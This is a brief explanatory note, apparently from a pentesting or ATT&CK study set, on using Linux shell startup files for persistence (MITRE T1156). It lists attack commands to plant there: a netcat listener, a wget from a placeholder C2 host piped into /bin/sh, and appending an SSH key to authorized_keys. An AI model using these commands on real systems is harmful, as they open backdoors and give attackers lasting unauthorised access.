These files are executed in a user's context when a new shell opens or the user logs in.

Commands in these are executed before the initial command prompt is returned

• bash_profile - login shells
• .bashrc - non login shells

So you could add commands such as:

• Create a netcat listener
  • nc -l 1234
• download commands from a C2 and execute them
  • wget blah.com/commands.txt | /bin/sh
• Add ssh key to authorized_keys
  • echo 'key' >> ~/.ssh/authorized_keys

https://attack.mitre.org/techniques/T1156/